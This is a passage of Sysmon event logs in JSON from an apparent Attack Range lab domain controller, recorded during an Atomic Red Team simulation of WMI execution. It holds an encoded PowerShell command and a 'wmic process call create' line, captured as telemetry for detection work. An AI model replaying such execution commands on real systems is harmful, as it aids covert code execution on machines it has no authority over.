{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5451,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5452,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5453,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5454,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5455,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.346\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-00107FD70800}\r\nTargetProcessId: 4508\r\nTargetImage: C:\\Windows\\system32\\notepad.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\wbem\\cimwin32.dll+3adce|C:\\Windows\\system32\\wbem\\cimwin32.dll+3d475|C:\\Windows\\system32\\wbem\\cimwin32.dll+3ab15|C:\\Windows\\system32\\wbem\\cimwin32.dll+3b393|C:\\Windows\\system32\\wbem\\cimwin32.dll+3bb40|C:\\Windows\\SYSTEM32\\framedynos.dll+20256|C:\\Windows\\SYSTEM32\\framedynos.dll+218b5|C:\\Windows\\system32\\wbem\\wmiprvse.exe+1704a|C:\\Windows\\system32\\wbem\\wmiprvse.exe+1724f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.346","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-00107FD70800}","TargetProcessId":"4508","TargetImage":"C:\\Windows\\system32\\notepad.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\wbem\\cimwin32.dll+3adce|C:\\Windows\\system32\\wbem\\cimwin32.dll+3d475|C:\\Windows\\system32\\wbem\\cimwin32.dll+3ab15|C:\\Windows\\system32\\wbem\\cimwin32.dll+3b393|C:\\Windows\\system32\\wbem\\cimwin32.dll+3bb40|C:\\Windows\\SYSTEM32\\framedynos.dll+20256|C:\\Windows\\SYSTEM32\\framedynos.dll+218b5|C:\\Windows\\system32\\wbem\\wmiprvse.exe+1704a|C:\\Windows\\system32\\wbem\\wmiprvse.exe+1724f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5456,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.346\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-00107FD70800}\r\nTargetProcessId: 4508\r\nTargetImage: C:\\Windows\\system32\\notepad.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.346","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-00107FD70800}","TargetProcessId":"4508","TargetImage":"C:\\Windows\\system32\\notepad.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5457,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.368\r\nProcessGuid: {41C8662E-20D6-5F25-0000-001027D90800}\r\nProcessId: 4788\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic /node:\"127.0.0.1\" process call create notepad.exe\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nParentProcessId: 2992\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.368","ProcessGuid":"{41C8662E-20D6-5F25-0000-001027D90800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic /node:\"127.0.0.1\" process call create notepad.exe\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20D0-5F25-0000-0010871B0800}","ParentProcessId":"2992","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5458,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001027D90800}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663735cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc